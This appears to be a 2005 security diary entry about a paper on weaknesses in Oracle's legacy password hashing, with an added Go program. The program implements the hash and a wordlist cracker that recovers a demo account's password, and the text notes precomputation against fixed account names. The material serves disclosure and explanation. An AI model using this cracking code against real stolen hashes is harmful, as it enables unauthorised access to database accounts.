Handler Joshua Wright and Dr. Carlos Cid of the Information Security Group at Royal Holloway, University of London, have published a paper describing the inner workings of the Oracle password hashing algorithm and its vulnerabilities. A copy of the paper is available through the SANS Reading Room at http://www.sans.org/rr/special/index.php?id=oracle_pass.
The authors' findings indicate that the password hashing algorithm is weak (passwords are folded to uppercase before hashing, the username is the only salt, and the hash is built from single DES in CBC mode under a fixed key) and subject to a number of attacks. If an attacker is able to obtain Oracle password hash information from a compromised system, through traffic sniffing, SQL injection or other attack vectors, they will likely be able to recover plaintext passwords with few resources, even when strong passwords are selected. The paper also recommends several actions Oracle DBAs can take to help mitigate this threat.
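To make the weakness concrete, here is an added example that is not code from this diary, from the paper or from Oracle: a small Go program that implements the legacy Oracle password verifier as the paper analyses it (the scheme used by Oracle 7 through 10g). The username and password are concatenated, uppercased, widened to two bytes per character, zero-padded to a DES block, then run through DES-CBC twice, first under a fixed key and then under the last ciphertext block of the first pass; the last block of the second pass is the stored hash. The function names, the wordlist and the use of the well-known SCOTT/TIGER demo account are this example's own choices.

```go
package main

import (
	"crypto/cipher"
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

// fixedKey is the constant DES key the legacy Oracle algorithm uses for its
// first CBC pass; it is the same on every database and for every user.
var fixedKey = []byte{0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF}

// desCBCLastBlock runs single DES in CBC mode with an all-zero IV over data
// (a whole number of blocks) and returns only the final ciphertext block.
func desCBCLastBlock(key, data []byte) []byte {
	block, err := des.NewCipher(key)
	if err != nil {
		panic(err)
	}
	iv := make([]byte, des.BlockSize)
	out := make([]byte, len(data))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, data)
	return out[len(out)-des.BlockSize:]
}

// OracleHash computes the legacy (Oracle 7 through 10g) password verifier:
// username||password, uppercased, widened to two bytes per character with a
// 0x00 high byte, zero-padded to 8 bytes, DES-CBC under fixedKey, then DES-CBC
// again under the last block of the first pass. The last block of the second
// pass, as uppercase hex, is the stored hash. ASCII input only in this example.
func OracleHash(username, password string) string {
	s := strings.ToUpper(username + password)
	data := make([]byte, 0, 2*len(s)+des.BlockSize)
	for i := 0; i < len(s); i++ {
		data = append(data, 0x00, s[i]) // case has already been discarded
	}
	for len(data) == 0 || len(data)%des.BlockSize != 0 {
		data = append(data, 0x00) // zero padding, no length encoding
	}
	derivedKey := desCBCLastBlock(fixedKey, data)
	return strings.ToUpper(hex.EncodeToString(desCBCLastBlock(derivedKey, data)))
}

// CrackHash shows why a stolen (username, hash) pair is so exposed: there is no
// random salt and no work factor, so each wordlist candidate costs two short
// DES-CBC passes, and the uppercase folding collapses "Tiger", "tiger" and
// "TIGER" into one guess.
func CrackHash(username, hash string, wordlist []string) (string, bool) {
	target := strings.ToUpper(hash)
	for _, candidate := range wordlist {
		if OracleHash(username, candidate) == target {
			return strings.ToUpper(candidate), true
		}
	}
	return "", false
}

func main() {
	// Constructed inputs: the SCOTT/TIGER demo account and a four-word list.
	fmt.Println("SCOTT/TIGER  ->", OracleHash("SCOTT", "TIGER"))
	fmt.Println("scott/tiger  ->", OracleHash("scott", "tiger"))  // same value: case is lost
	fmt.Println("SYSTEM/TIGER ->", OracleHash("SYSTEM", "TIGER")) // differs only via the username
	wordlist := []string{"welcome1", "oracle", "tiger", "manager"}
	if pw, ok := CrackHash("SCOTT", OracleHash("SCOTT", "TIGER"), wordlist); ok {
		fmt.Println("recovered:", pw)
	}
}
```

Running it prints the 16-hex-character verifier for SCOTT/TIGER, shows that scott/tiger produces the identical value, and recovers the password from the short list. Because the username is the only salt, an attacker who targets a fixed account name (SYS, SYSTEM, DBSNMP) can precompute hashes for that name once and reuse them against every database.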
The SANS Institute contacted the Oracle product security team about these findings on July 12, 2005. Subsequent requests for clarification on what Oracle plans to do to address these vulnerabilities have gone unanswered. Oracle customers are encouraged to communicate their desire to see these vulnerabilities resolved through the appropriate channels.
Oct 27th 2005